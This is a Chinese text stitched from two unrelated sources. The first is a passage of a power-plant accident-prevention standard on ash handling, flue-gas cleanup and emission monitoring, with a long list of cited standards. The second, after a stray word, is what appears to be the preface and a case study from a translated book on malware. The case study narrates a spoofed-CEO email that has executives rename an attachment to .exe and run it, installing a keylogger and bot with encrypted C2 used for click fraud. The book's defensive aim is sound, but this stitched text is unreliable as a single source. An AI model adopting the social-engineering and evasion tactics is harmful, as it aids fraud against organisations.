电厂宜采用干除灰输送系统、干排渣系统。如采用水力除灰电厂应实 现灰水回收循环使用,灰水设施和除灰系统投运前必须做水压试验。 224 25.1.3 电厂应按地方、国家烟气污染物排放标准规定的各污染物排放限值, 采用相应的烟气除尘设施、脱硫设施与脱硝设施,投运的环保设施及系统应运行 正常,脱除效率应达到设计要求,各污染物排放浓度达到国家及地方标准规定的 要求。 25.1.4 电厂的锅炉实际燃用煤质的灰分、硫分、低位发热量等不宜超出设计 煤质及校核煤质。 25.1.5 灰场大坝应充分考虑大坝的强度和安全性,大坝工程设计应最大限度 地合理利用水资源并建设灰水回用系统,贮灰场应无渗漏设计,防止污染地下水。 25.2 加强贮灰场运行维护管理 25.2.1 建立贮灰场(灰坝坝体)安全管理制度,明确管理职责。应设专人定 期对灰坝、灰管、灰场和排、渗水设施进行巡检。应坚持巡检制度并认真做好巡 检记录,发现缺陷和隐患及早解决。汛期应加强贮灰场管理,增加巡检频率。 25.2.2 应对贮灰场定期组织开展安全评估工作,原则上每三年进行一次。 25.2.3 加强灰水系统运行参数和污染物排放情况及地下水、土壤等周边环境 的影响的监测分析,发现问题及时采取措施。 25.2.4 定期对灰管进行检查,重点包括灰管(含弯头)的磨损和接头、各支 撑装置(含支点及管桥)的状况等,防止发生管道断裂事故。灰管道泄漏时应及 时停运,以防蔓延形成污染事故。 25.2.5 对分区使用或正在取灰外运的贮灰场,必须制定落实严格的防止扬尘 污染的管理制度,配备必要的防尘设施,避免扬尘对周围环境造成污染。 25.2.6 贮灰场应根据实际情况进行覆土、种植或表面固化处理等措施,防止 发生扬尘污染。当贮灰场服务期满或不再承担新的贮存、填埋任务时,应启动封 场作业,并采取相应的污染防治措施,防止造成环境污染和生态破坏。 25.3 加强废水处理,防止超标排放 25.3.1 电厂内部应做到废水集中处理,提高水的重复利用率,减少废水和污 染物排放量。禁止无排污许可证或者违反排污许可证的规定排放废水、污水。禁 止利用渗井、渗坑、暗管、雨水管、裂隙、溶洞等排放废水、污水。 25.3.2 应对废(污)水处理设施制订严格的运行维护和检修制度,加强对污 水处理设备的维护、管理,确保废(污)水处理运转正常。 225 25.3.3 作好电厂废(污)水处理设施运行记录,并定期监督废水处理设施的 投运率、处理效率和废水排放达标率。 25.3.4 锅炉进行化学清洗时,必须制订废液处理方案,并经审批后执行,属 于危险废物的应按危险废物有关要求进行处置。 25.4 加强除尘、除灰、除渣设施运行维护管理 25.4.1 加强除尘设施的运行、维护及管理,除尘器的运行参数控制在最佳状 态。及时处理设备运行中存在的故障和问题,保证除尘器的除尘效率和投运率。 烟尘排放浓度应符合国家、地方的排放标准要求,不能达到要求的应进行除尘器 提效改造。 25.4.2 新建、改造和大修后的除尘设施应进行性能试验,性能指标未达标不 得验收。 25.4.3 电除尘器(包括旋转电极)的除尘效率、电场投运率、烟尘排放浓度 应满足设计的要求,同时烟尘排放浓度达到国家、地方的排放标准规定要求。 25.4.4 袋式除尘器、电袋复合式除尘器的除尘效率、滤袋破损率、阻力、滤 袋寿命等应满足设计的要求,同时烟尘排放浓度达到国家、地方的排放标准规定 要求。运行期间出现滤袋破损应及时处理。 25.4.5 防止电厂干除灰输送系统、干排渣系统及水力输送系统的输送管道泄 漏,应制定紧急事故措施及预案。 25.4.6 锅炉启动时油枪点火、燃油、煤油混烧、等离子投入等工况下,电除 尘器应在闪络电压以下运行,袋式除尘器或电袋复合式除尘器的滤袋应提前进行 预喷涂处理。 25.4.7 袋式除尘器或电袋复合式除尘器的旁路烟道及阀门应零泄漏。 25.4.8 应对除尘设施本体和烟道的腐蚀和磨损情况进行定期检查,防止发生 大面积腐蚀漏风和设备塌陷。 25.4.9 加强袋式除尘器、电袋复合式除尘器入口烟温监测,出现超温现象应 及时采取措施,防止滤袋因长期超温运行造成滤袋烧毁。 25.4.10 加强湿式电除尘器入口烟温、氧量及电场电流电压、闪络频次等参 数的监视,出现异常情况及时采取应急措施,防止因烟气过热、放电过热、短路 等引起湿式电除尘器火灾事故。 226 25.4.11 应加强除尘器灰斗料位监视,当灰位超过高位报警值时,应立即采 取降低灰位的措施,避免长期高料位运行。应制定预防灰斗满灰和卸灰不畅的处 理措施,出现异常情况及时处理。 24.4.12 对于经过电改布袋的除尘器,要委托有相应资质能力的专业机构开 展钢结构强度校核,并确保在极端运行工况下仍具有足够安全裕度。 25.5 加强脱硫设施运行维护管理 25.5.1 应制订完善的脱硫设施运行、维护及管理制度,并严格贯彻执行。 25.5.2 锅炉运行时脱硫系统必须同时投入,SO2排放浓度应达到国家及地方 的排放标准。 25.5.3 新建、改造和大修后的脱硫系统应进行性能试验,指标未达到标准的 不得验收。 25.5.4 脱硫系统运行时必须投入废水处理系统,处理后的废水应满足国家及 行业标准。 25.5.5 应对脱硫系统吸收塔、换热器、烟道等设备的腐蚀、结晶和堵塞情况 进行定期检查,防止发生大面积腐蚀和堵塞。 25.5.6 应加强对脱硫系统的巡回检查,及时发现并消除系统的跑冒滴漏。 25.5.7 应加强对除雾器组件、喷淋层的冲洗及检查,防止发生除雾器及喷淋 层的堵塞、脱落、变形。 25.5.8 脱硫系统的副产品应按照要求进行堆放、贮存、运输和利用,避免二 次污染。 25.5.9 脱硫系统的上游设备除尘器应保证其出口烟尘浓度满足脱硫系统运 行要求,避免吸收塔浆液中毒。 25.6 加强脱硝设施运行维护管理 25.6.1 制订完善的脱硝设施运行、维护及管理制度,并严格贯彻执行。 25.6.2 脱硝系统的脱硝效率、投运率、应达到设计要求,同时NOX排放浓度 满足国家及地方的排放标准,不能达到标准要求应加装或更换催化剂。 25.6.3 新建、改造和大修后的脱硝系统应进行性能试验,指标未达到标准的 不得验收。 25.6.4 应定期对脱硝催化剂进行性能检测,开展催化剂寿命评估,及时对失 227 效催化剂进行更换或再生。 25.6.5 应控制脱硝反应器出口氨逃逸率,防止对后续设备造成腐蚀、堵塞以 及板结。 25.6.6 设有液氨储存设备、采用燃油热解炉的脱硝系统,应制定事故应急预 案,每年至少组织一次环境污染的事故预想、防火、防爆处理演习。 25.7 加强烟气在线连续监测装置运行维护管理 按照《固定污染源烟气(SO2、NOx、颗粒物)排放连续监测技术规范》(HJ 75)、《固定污染源烟气(SO2、NOx、颗粒物)排放连续监测系统技术要求及 检测方法》(HJ 76)标准相关内容执行。 228 附录 引用法律法规和标准规范目录 一、国家法律法规 《中华人民共和国消防法》 《中华人民共和国网络安全法》 《中华人民共和国特种设备安全法》 《中华人民共和国水污染防治法》 《中华人民共和国数据安全法》 《中华人民共和国密码法》 《中华人民共和国环境影响评价法》 《中华人民共和国环境保护法》 《中华人民共和国固体废物污染环境防治法》 《中华人民共和国防洪法》 《中华人民共和国道路交通安全法》 《中华人民共和国大气污染防治法》 《中华人民共和国安全生产法》 《中华人民共和国防汛条例》 《中华人民共和国特种设备安全监察条例》 《中华人民共和国计算机信息系统安全保护条例》 《中华人民共和国关键信息基础设施安全保护条例》 《中华人民共和国电力安全事故应急处置和调查处理条例》 《中华人民共和国排污许可管理条例》 《中华人民共和国水库大坝安全管理条例》 二、政府部门规章及规范性文件 《电力监控系统安全防护规定》(国家发展改革委令2014年第14号) 《水电站大坝运行安全监督管理规定》(国家发展改革委令2015年第23号) 《电力建设工程施工安全监督管理办法》(国家发展改革委令2015年第28号) 《特种作业人员安全技术培训考核管理规定》(国家安监总局令2015年第80 号修正) 229 《工贸企业有限空间作业安全管理与监督暂行规定》(国家安监总局令2015 年第80号修正) 《特种设备作业人员监督管理办法》(国家质监总局令2011年第140号修正) 《电力安全生产“十四五”行动计划》(国能发安全〔2021〕62号) 《水电站大坝安全定期检查监督管理办法》(国能安全〔2015〕145号) 《水电站大坝安全注册登记监督管理办法》(国能安全〔2015〕146号) 《燃气电站天然气系统安全管理规定》(国能安全〔2015〕450号) 《水电站大坝运行安全信息报送办法》(国能安全〔2016〕261号) 《燃煤发电厂贮灰场安全评估导则》(国能安全〔2016〕234号) 《水电站大坝安全监测工作管理办法》(国能发安全〔2017〕61号) 《重大活动电力安全保障工作规定》(国能发安全〔2020〕18号) 《国家能源局综合司关于加强水电站水淹厂房防范工作的通知》(国能综函 安全〔2017〕66号) 《防止电气误操作装置管理规定》(能源安保〔1990〕1110号) 《电站压力式除氧器安全技术规定》(能源安保〔1991〕709号) 《关于吸取俄罗斯萨扬水电站事故教训进一步加强水电站安全监督管理的 意见》(电监安全〔2010〕2号) 《突发环境事件应急管理办法》(环境保护部令2015年第34号) 《商用密码应用安全性评估管理办法(试行)》 三、国家标准 《火电厂大气污染物排放标准》GB 13223-2011 《锅炉大气污染物排放标准》GB 13271-2014 《大气污染物综合排放标准》GB 16297-1996 《一般工业固体废物贮存、处置场污染控制标准》GB 18599-2020 《高压交流断路器》GB 1984-2014 《高压交流隔离开关和接地开关》GB 1985-2014 《互感器 第2部分:电流互感器的补充技术要求》GB 20840.2-2014 《高压带电显示装置》GB 25081-2010 《移动式升降工作平台 设计计算、安全要求和测试方法》GB 25849-2010 230 《电业安全工作规程 热力和机械》GB 26164.1-2010 《电力安全工作规程 电力线路部分》GB 26859-2011 《电力安全工作规程 发电厂和变电站电气部分》GB 26860-2011 《电力安全工作规程 高压试验室部分》GB 26861-2011 《安全标志及其使用导则》GB 2894-2008 《工业用合成盐酸》GB 320-2006 《电力系统安全稳定导则》GB 38755-2019 《工业企业厂内铁路、道路运输安全规程》GB 4387-2008 《氢气使用安全技术规程》GB 4962-2008 《建筑设计防火规范》GB 50016-2014 《城镇燃气设计规范(2020年版)》GB 50028-2006 《爆炸危险环境电力装置设计规范》GB 50058-2014 《爆炸和火灾危险环境电力装置设计规范》GB 50058-2014 《66kV及以下架空电力线路设计规范》GB 50061-2010 《交流电气装置的过电压保护和绝缘配合设计规范》GB 50064-2014 《交流电气装置的接地设计规范》GB 50065-2011 《建筑灭火器配置设计规范》GB 50140-2005 《电气装置安装工程 电气设备交接试验标准》GB 50150-2016 《火灾自动报警系统施工及验收标准》GB 50166-2019 《电力装置安装工程电缆线路施工及验收规范》GB 50168-2018 《电气装置安装规程 蓄电池施工及验收规范》GB 50172-2012 《石油天然气工程设计防火规范》GB 50183-2015 《电力工程电缆设计标准》GB 50217-2018 《水喷雾灭火系统技术规范》GB 50219-2014 《并联电容器装置设计规范》GB 50227-2017 《火力发电厂与变电站设计防火规范》GB 50229-2019 《110~750kV架空输电线路施工及验收规范》GB 50233-2014 《110kV~750kV架空输电线路设计规范》GB 50545-2010 《大中型火力发电厂设计规范》GB 50660-2017 231 《1000kV架空输电线路设计规范》GB 50665-2011 《秸秆发电厂设计规范》GB 50762-2012 《±800kV及以下换流站换流变压器施工及验收规范》GB 50776-2012 《±800kV直流架空输电线路设计规范》GB 50790-2013 《水电工程设计防火规范》GB 50872-2014 《电化学储能电站设计规范》GB 51048-2014 《通信电源设备安装工程验收规范》GB 51199-2016 《污水综合排放标准》GB 8978-1996 《电力变压器 第3部分:绝缘水平、绝缘试验和外绝缘空气间隙》GB/T 1094.3-2017 《电力变压器 第5部分:承受短路的能力》GB/T 1094.5-2008 《高压交流开关设备和控制设备标准的共用技术要求》GB/T 11022-2020 《标称电压1kV以上交流电力系统用并联电容器 第1部分:总则》GB/T 11024.1-2019 《标称电压1kV以上交流电力系统用并联电容器 第2部分:老化试验》GB/T11024.2-2019 《标称电压1kV以上交流电力系统用并联电容器 第3部分:并联电容器和并 联电容器组的保护》GB/T 11024.3-2019 《标称电压1kV以上交流电力系统用并联电容器 第4部分:内部熔丝》GB/T11024.4-2019 《水轮发电机组自动化元件(装置)及其系统基本技术条件》GB/T 11805-2019 《工业六氟化硫》GB/T 12022-2014 《火力发电机组及蒸汽动力设备水汽质量》GB/T 12145-2016 《继电保护和安全自动装置技术规程》GB/T 14285-2006 《大中型水轮机进水阀门基本技术条件》GB/T 14478-2012 《电厂用矿物涡轮机油维护管理导则》GB/T 14541-2017 《变压器油维护管理导则》GB/T 14542-2017 《水轮机基本技术条件》GB/T 15468-2020 《梯子 第1部分:术语、型式和功能尺寸》GB/T 17889.1-2012 《梯子 第2部分:要求、试验和标志》GB/T 17889.2-2012 《高处作业吊篮》GB/T 19155-2017 《电力工程直流电源设备通用技术条件及安全要求》GB/T 19826-2014 《风电场接入电力系统技术规范》GB/T 19963.1-2021 232 《风电场接入电力系统技术规定》GB/T 19963-2021 《光伏发电站接入电力系统技术规定》GB/T 19964-2012 《隐极同步发电机定子绕组端部动态特性和振动测量方法及评定》GB/T 2014-2016 《发电机定子铁心磁化试验导则》GB/T 20835-2016 《工业用氢氧化钠》GB/T 209-2018 《信息安全技术信息 安全风险评估规范》GB/T 20984-2022 《信息技术 安全技术 信息安全事件管理指南》GB/T 20985-2020 《信息安全技术信息 系统灾难恢复规范》GB/T 20988-2007 《信息安全技术信息 安全控制实用规则》GB/T 22081-2016 《信息安全技术网络 安全等级保护基本要求》GB/T 22239-2019 《信息安全技术信息 系统安全等级保护定级指南》GB/T 22240-2020 《混流式水泵水轮机技术条件》GB/T 22581-2008 《信息安全技术信息 安全应急响应计划规范》GB/T 24363-2009 《污秽条件下使用的高压绝缘子的选择和尺寸确定 第1部分:定义、信息和 一般原则》GB/T 26218.1-2010 《污秽条件下使用的高压绝缘子的选择和尺寸确定 第2部分:交流系统用瓷 和玻璃绝缘子》GB/T 26218.2-2010 《污秽条件下使用的高压绝缘子的选择和尺寸确定 第3部分:交流系统用复 合绝缘子》GB/T 26218.3-2011 《污秽条件下使用的高压绝缘子的选择和尺寸确定 第4部分:直流系统用绝 缘子》GB/T 26218.4-2019 《移动式升降工作平台 安全规则、检查、维护和操作》GB/T 27548-2011 《移动式升降工作平台 操作人员培训》GB/T 27549-2011 《火力发电机组一次调频试验及性能验收导则》GB/T 30370-2013 《高压并联电容器装置的通用技术要求》GB/T 30841-2014 《电网运行准则》GB/T 31464-2015 《220kV~750kV电网继电保护和安全自动装置配置技术规范》GB/T 34122-2017 《高处作业分级》GB/T 3608-2008 《燃气电站天然气系统安全生产管理规范》GB/T 36039-2018 233 《高压直流输电用晶闸管阀》GB/T 36559-2018 《电力监控系统网络安全防护导则》GB/T 36572-2018 《光伏发电并网逆变器技术要求》GB/T 37408-2019 《无人值守变电站监控系统技术规范》GB/T 37546-2019 《牵引站供电线路的继电保护配置及整定计算原则》GB/T 38435-2019 《电力系统技术导则》GB/T 38969-2020 《3.6kV-40.5kV交流金属封闭开关设备和控制设备》GB/T 3906-2020 《电力系统电压和无功电力技术导则》GB/T 40427-2021 《电力系统安全稳定计算规范》GB/T 40581-2021 《并网电源涉网保护技术要求》GB/T 40586-2021 《电力系统安全稳定控制系统技术规范》GB/T 40587-2021 《电力系统网源协调技术导则》GB/T 40594-2021 《并网电源一次调频技术规定及试验导则》GB/T 40595-2021 《电力系统大面积停电恢复导则》GB/T 40613-2021 《110kV~750kV架空输电线路设计规范》GB/T 50545-2010 《海上风力发电工程施工规范》GB/T 50571-2010 《1000kV架空输电线路设计规范》GB/T 50665-2011 《±800kV直流架空输电线路设计规范》GB/T 50790-2013 《电力系统用串联电容器 第1部分:总则》GB/T 6115.1-2008 《电力系统用串联电容器 第2部分:串联电容器组用保护设备》GB/T 6115.2-2017 《电力系统用串联电容器 第3部分:内部熔丝》GB/T 6115.3-2002 《电力系统用串联电容器 第4部分:晶闸管控制的串联电容器》GB/T 6115.4-2014 《隐极同步发电机技术要求》GB/T 7064-2017 《同步电机励磁系统电力系统研究用模型》GB/T 7409.2-2020 《同步电机励磁系统大、中型同步发电机励磁系统技术要求》GB/T 7409.3-2007 《额定电压72.5kV及以上气体绝缘金属封闭开关设备》GB/T 7674-2020 《水轮机调速系统技术条件》GB/T 9652.1-2019 《信息安全技术标准规范信息安全分类分级指南》GB/Z 20986-2007 《信息安全技术重要工业控制系统网络安全防护导则》GB/Z 41288-2022 234 四、电力行业及相关标准 《城镇燃气设施运行、维护和抢修安全技术规程》CJJ 51-2016 《城镇燃气埋地钢质管道腐蚀控制技术规程》CJJ 95-2013 《电力系统安全稳定控制系统通用技术条件》DL/T 1092-2008 《火电发电厂锅炉汽包水位测量系统技术规程》DL/T 1393-2014 《变电站监控系统防止电气误操作技术规范》DL/T 1404-2015 《电站煤粉锅炉燃煤掺烧技术导则》DL/T 1445-2015 《同步发电机进相试验导则》DL/T 1523-2016 《可逆式水泵水轮机调节系统技术条件》DL/T 1549-2016 《湿式电除尘器技术规范》DL/T 1589-2016 《并网风电场继电保护配置及整定技术规范》DL/T 1631-2016 《换流变压器阀侧套管技术规范》DL/T 1673-2016 《智能电网调度控制系统技术规范》DL/T 1709-2017 《数字式励磁调节器辅助控制技术要求》DL/T 1767-2017 《旋转电机预防性试验规程》DL/T 1768-2017 《发电厂封闭母线运行与维护导则》DL/T 1769-2017 《电力系统网源协调技术规范》DL/T 1870-2018 《循环流化床锅炉防磨技术导则》DL/T 1906-2018 《水轮发电机励磁系统配置导则》DL/T 1970-2019 《火力发电机组电气启动试验规程》DL/T 2092-2020 《电力系统安全稳定控制系统设计及应用技术规范》DL/T 2193-2020 《超临界循环流化床锅炉运行导则》DL/T 2198-2020 《循环流化床锅炉燃料掺烧技术导则》DL/T 2199-2020 《水电站防水淹厂房安全检查技术规程》DL/T 2447-2021 《电力物联网体系架构与功能》DL/T 2459-2021 《±800kV 直流架空输电线路检修规程》DL/T 251-2012 《抽水蓄能可逆式水泵水轮机运行规程》DL/T 293-2011 《发电机定子绕组端部电晕检测与评定导则》DL/T 298-2009 《火电厂凝汽器管防腐防垢导则》DL/T 300-2011 235 《换流站设备巡检导则》DL/T 348-2019 《换流站运行操作导则》DL/T 349-2019 《晶闸管换流阀检修导则》DL/T 351-2019 《换流变压器、平波电抗器检修导则》DL/T 354-2019 《光纤通道传输保护信息通用技术条件》DL/T 364-2019 《电站锅炉炉膛防爆规程》DL/T 435-2018 《火力发电厂金属技术监督规程》DL/T 438-2016 《高压交流隔离开关和接地开关》DL/T 486-2010 《电力系统自动化设计规程》DL/T 5003-2017 《火力发电厂烟风煤粉管道设计规范》DL/T 5121-2020 《火力发电厂制粉系统设计计算技术规定》DL/T 5145-2012 《电力调度自动化运行管理规程》DL/T 516-2017 《燃气-蒸汽联合循环电厂设计规定》DL/T 5174-2020 《火力发电厂热工控制系统设计技术规定》DL/T 5175-2003 《火力发电厂热工自动化就地设备安装、管路及电缆设计技术规定》DL/T 5182-2017 《电力建设施工及验收技术规范 第 4 部分:热工仪表及控制装置》DL/T 5190.5-2019 《城市电力电缆线路设计技术规定》DL/T 5221-2015 《火力发电厂辅助车间系统仪表与控制设计规程》DL/T 5227-2020 《±800kV 及以下直流架空输电线路工程施工及验收规程》DL/T 5235-2010 《电力光纤通信工程验收规范》DL/T 5344-2018 《火力发电厂热工保护系统设计技术规定》DL/T 5428-2009 《重覆冰架空输电线路设计技术规程》DL/T 5440-2009 《电力通信运行管理规程》DL/T 544-2012 《电力系统光纤通信运行管理规程》DL/T 547-2020 《电力系统通信站过电压防护规程》DL/T 548-2012 《架空输电线路荷载规范》DL/T 5551-2018 《220kV~750kV 电网继电保护装置运行整定规程》DL/T 559-2018 《电力系统通信设计导则》DL/T 5599-2021 《水轮机电液调节系统及装置技术规程》DL/T 563-2016 236 《电厂用磷酸酯抗燃油运行维护导则》DL/T 571-2014 《电力变压器运行规程》DL/T 572-2021 《电力变压器检修规程》DL/T 573-2021 《电力变压器分接开关运行维修导则》DL/T 574-2021 《水电厂计算机监控系统基本技术条件》DL/T 578-2008 《大中型水轮发电机静止整流励磁系统技术条件》DL/T 583-2018 《3kV~110kV 电网继电保护装置运行整定规程》DL/T 584-2017 《继电保护和安全自动装置运行管理规程》DL/T 587-2016 《电力设备预防性试验规程》DL/T 596-2021 《汽轮发电机漏水、漏氢的检验》DL/T 607-2017 《300MW~600M 级机组煤粉锅炉运行导则》DL/T 611-2016 《水电厂自动化元件(装置)及其系统运行维护与检修试验规程》DL/T 619-2012 《水电厂自动化元件(装置)及其系统运行维护与检修试验规程》DL/T 619-2012 《电力系统继电保护及安全自动装置运行评价规程》DL/T 623-2010 《劣化悬式绝缘子检测规程》DL/T 626-2015 《氢冷发电机氢气湿度技术要求》DL/T 651-2017 《火力发电厂锅炉炉膛安全监控系统验收测试规程》DL/T 655-2017 《火力发电厂汽轮机控制及保护系统验收测试规程》DL/T 656-2016 《火力发电厂模拟量控制系统验收测试规程》DL/T 657-2015 《火力发电厂开关量控制系统验收测试规程》DL/T 658-2017 《火力发电厂分散控制系统验收测试规程》DL/T 659-2016 《大型发电机变压器继电保护整定计算导则》DL/T 684-2012 《大型发电机变压器继电保护整定计算导则》DL/T 684-2018 《微机型防止电气误操作系统通用技术条件》DL/T 687-2010 《运行中氢冷发电机用密封油质量》DL/T 705-2021 《汽轮机调节保安系统试验导则》DL/T 711-2019 《火力发电厂金属材料选用导则》DL/T 715-2015 《电力系统用蓄电池直流电源装置运行与维护技术规程》DL/T 724-2021 《大型汽轮发电机定子绕组端部动态特性的测量及评定》DL/T 735-2000 237 《架空输电线路运行规程》DL/T 741-2019 《回转式空气预热器运行维护规程》DL/T 750-2016 《火力发电厂热工自动化系统检修运行维护规程》DL/T 774-2015 《风力发电场安全规程》DL/T 796-2012 《大型发电机内冷却水质及系统技术要求》DL/T 801-2010 《火电厂汽水化学导则 第 4 部分:锅炉给水处理》DL/T 805.4-2016 《水电厂计算机监控系统试验验收规程》DL/T 822-2012 《大容量煤粉燃烧锅炉炉膛选型导则》DL/T 831-2015 《大型同步发电机励磁系统技术条件》DL/T 843-2021 《同步发电机励磁系统技术条件》DL/T 843-2021 《电流互感器和电压互感器选择及计算规程》DL/T 866-2015 《便携式接地及接地短路装置》DL/T 879-2021 《火力发电厂厂级监控信息系统技术条件》DL/T 924-2016 《电站锅炉安全阀技术规程》DL/T 959-2020 《继电保护和电网安全自动装置检验规程》DL/T 995-2016 《电力系统电压和无功电力技术导则》DL/T 1773-2017 《化学监督导则》DL/T 246-2015 《接地装置特性参数测量导则》DL/T 475-2017 《火力发电厂水汽化学监督导则》DL/T 561-2013 《电力行业锅炉压力容器安全监督规程》DL/T 612-2017 《火力发电厂汽水管道与支吊架维修调整导则》DL/T 616-2006 《电站锅炉压力容器检验规程》DL/T 647-2004 《发电厂凝汽器及辅机冷却器管选材导则》DL/T 712-2021 《火力发电厂锅炉化学清洗导则》DL/T 794-2012 《火力发电厂焊接热处理技术规程》DL/T 819-2019 《火力发电厂焊接技术规程》DL/T 869-2021 《电力基本建设热力设备化学监督导则》DL/T 889-2015 《火力发电厂停(备)用热力设备防锈蚀导则》DL/T 956-2017 《电力建设安全工作规程 第 1 部分:火力发电》DL 5009.1-2014 238 《电力建设安全工作规程 第 2 部分:电力线路》DL 5009.2-2013 《电力建设安全工作规程 第 3 部分:变电站》DL 5009.3-2013 《电力设备典型消防规程》DL 5027-2015 《电站锅炉压力容器检验规程》DL 647-2004 《电力系统治安反恐防范要求》GA 1800-2021 《袋式除尘工程通用技术规范》HJ 2020-2012 《火电厂除尘工程技术规范》HJ 2039-2014 《固定污染源烟气(SO2、NOx、颗粒物)排放连续监测技术规范》HJ 75-2017 《固定污染源烟气(SO2、NOx、颗粒物)排放连续监测系统技术要求及检 测方法》HJ 76-2017 《排污单位自行监测技术指南总则》HJ 819-2017 《排污单位自行监测技术指南火力发电及锅炉》HJ 820-2017 《石灰石/石灰-石膏湿法烟气脱硫工程通用技术规范》HJ/T 179-2018 《高压并联电容器用串联电抗器》JB/T 5346-2014 《建筑拆除工程安全技术规范》JGJ 147-2016 《建筑施工高处作业安全技术规范》JGJ 80-2016 《压力变送器检定规程》JJG 882-2019 《风电场设计防火规范》NB 31089-2016 《水电站厂房设计规范》NB 35011-2016 《水电工程钢闸门设计规范》NB 35055-2015 《风电场动态无功补偿装置并网性能测试规范》NB/T 10316-2019 《压力钢管安全检测技术规程》NB/T 10349-2019 《水力发电厂机电设计规范》NB/T 10878-2021 《核电厂汽轮发电机励磁系统技术要求》NB/T 25100-2019 《风电功率预测系统功能规范》NB/T 31046-2013 《光伏发电站功率预测系统技术要求》NB/T 32011-2013 《水力发电厂自动化设计技术规范》NB/T 35004-2013 《水电机组机械液压过速保护装置基本技术条件》NB/T 35088-2016 《水电站地下厂房设计规范》NB/T 35090-2016 239 《海上风电场工程施工安全技术规范》NB/T 10393-2020 《架空输电线路雷电防护导则》Q/GDW 11452-2009 《1000kV 变电站接地技术规范》Q/GDW 278-2009 《火力发电厂分散控制系统技术规范书》QDG 1-K401-2004 《石油设施电器装置场所分类》SY/T 0025-1995 《大中型水电站地质灾害预警及应急管理技术规范》T/CEC 179-2018 《特种设备使用管理规则》TSG 08-2017 《锅炉安全技术规程》TSG 11-2020 《固定式压力容器安全技术监察规程》TSG 21-2016 《通信用高频开关电源系统》YD/T 1058-2015 240
standards
黑客大曝光 前言 内部威胁不再来自于“内部” 现在的每一次安全会议和研究都关注让企业安全管理员和家庭用户理解来自内部的威胁。内部威胁正在增长并且变得更加具有恶意性。内部攻击最大的3个类别是:窃取经济利益、IT蓄意破坏以及商业利益。安全专家认为用户是问题的起因,用户就是威胁。在技术上这么说是正确的,但是对于一个组织而言,实际的用户本身并不总是真正的威胁,真正的威胁是用户所拥有的角色或者访问权限。如果一位秘书具有的权限足以查看网络文件共享上的财务目录,那么感染她的机器的恶意软件也有同样的权限。 当今的恶意软件通过避开外部防护、在机器上执行程序,以及在内部用户账户中运行等手段,接管或者模拟内部角色,使恶意软件能够进行攻击、控制,并且和内部人员一样访问资源。所以在本书中,我们关注当今世界上的恶意软件的功能和所适用的技术。恶意软件是内部人员以及想要保持对这一内部角色控制权的攻击者。现在,我们关注对恶意软件威胁有效及无效的防护,最终也是对内部威胁防护的关注。不管你是家庭用户还是全球百强企业的安全团队成员,都必须要警惕。从个人和专业出发,对恶意软件保持警惕都会给你带来回报。别让你的机器成为恶意软件大军用于“借尸还魂”的又一个工具。 第一部分 恶意软件 案例研究:请在季度会议之前进行审核 根据Symantec和GFI 2009年4月发表的最新安全研究,定制和针对性的垃圾邮件和恶意软件攻击数量再次上升。而且,由于恶意软件业界的专业化,这种代码定制已经使安全界的防护和检测率有了明显的下降。Symantec在2008年中检测出近166万种恶意代码威胁,和2007年相比有明显的上升。新的恶意代码特征码同期增长了265%。随着恶意软件制作者持续地开发代码并且确保这些代码在新的环境中工作正常,他们将会不断地调整这些恶意软件以得到最佳的投资回报(ROI)。特洛伊木马占了前50种恶意代码的将近70%,这是因为它们对于日后保持对受害机器的远程访问非常有效。通过创建新的独特恶意代码,结合从网络仿冒得到的定制电子邮件技术和对防病毒软件进行欺骗的新方法,使前述的方案成为可能。 周二下午3点20分,一家中型制造企业的管理层的十位主管收到一封伪造得很逼真的电子邮件,这封邮件似乎来自公司的CEO。这封邮件的标题为“请在我们的会议之前进行审核”,并且要求收信人保存邮件附件并且将文件扩展名从.zip改为.exe,然后运行该程序。这个程序是用于周五的季度会议的插件,对于查看会议中播放的视频来说是必需的。CEO在邮件中提到,因为邮件服务器的安全要求不允许他发送可执行文件,所以主管们必须更改该附件名。 主管们按照得到的指令运行该程序。那些存有疑问的人看到他们的同事都收到相同的邮件,于是觉得这封邮件肯定是合法的。而且,因为这封邮件在这天较晚的时候发送,有些人直到下午5点之前才收到,他们没有时间去证实CEO是否发送了这封邮件。 邮件的附件确实是一个在每台机器上安装击键记录程序的恶意软件。谁会创建这个程序?他们的动机是什么?让我们来认识这位攻击者。 我们遇到的攻击者Bob Fraudster是本地一家小公司的编程人员。他主要使用基于Web的技术(如ASP.NET)进行编程,并制作动态网页和Web应用程序来支持该公司的市场活动。因为经济衰退,Bob刚刚削减了工资,所以他决定获取一些额外的收入。Bob访问Google.com搜索bot程序和僵尸网络(botnet),因为他听说这些工具能给运作者带来许多金钱,他认为这可能是赚取额外收入的一个好的途径。在这一个月中,他加入了IRC,听取其他人的意见,并且了解到在许多在线论坛上可以订购到bot软件,这些程序能够实现单击欺诈(click fraud)并且为他带来一些收入。通过研究,Bob知道大部分防病毒软件能够发现预编译的bot程序,因此他决定获取一份源代码来编译自己的bot。Bob专门订购了一个通过HTTP上的SSL与他租赁的主机通信的bot程序,从而减少了bot出站通信被安全软件拦截的几率。因为Bot使用HTTP上的SSL,bot的所有通信流量将被加密并且能够通过大部分内容过滤技术。Bob在各种搜索引擎上注册了广告经营者(Ad Syndicator),作为广告经营者,他将在自己的网站上显示来自搜索引擎的广告轮换程序(如AdSense)的广告,对于他在网站上的每次广告单击,他可以得到一点小小的收入(几分钱)。 Bob使用一些与bot一同订购的利用程序(exploits),加上一些订购的应用程序级漏洞来入侵全世界的Web服务器。使用标准的Web开发工具,他修改了网站上的HTML或者PHP页面,载入他的广告经营用户名和密码,这样他的广告就代替了网站自己的广告。实际上,Bob强迫他所破解的网站加入广告经营,这样当用户单击这些广告时,就将把钱送给他,而不是实际的网站经营者。这种通过用户单击网站广告赚钱的方法被称为按单击付费广告(pay-per-click,PPC),是Google所有收入的来源。 接下来,Bob使用armadillo packer软件打包恶意软件,使它看上去像来自于公司CEO的一个新PowerPoint幻灯片文件。他编写一封具体的定制电子邮件,让主管们相信附件是合法的并且来自于CEO。 现在主管们必须打开这个文件。Bob大约每过30分钟就向他购买的多个小公司的电子邮件地址发送这个幻灯片的拷贝,这个拷贝实际上安装了他所制作的bot程序。因为Bob曾经做过市场工作,并且实施过一些电子邮件活动,所以知道能够从互联网上的一个公司那里很容易地购买电子邮件地址列表。互联网上可供购买的电子邮件地址多得令人惊讶,Bob将精力集中于较小的公司而不是集团公司的邮件地址,因为他知道许多企业在电子邮件网关上使用防病毒软件,他不想让防病毒软件供应商注意到他的bot。 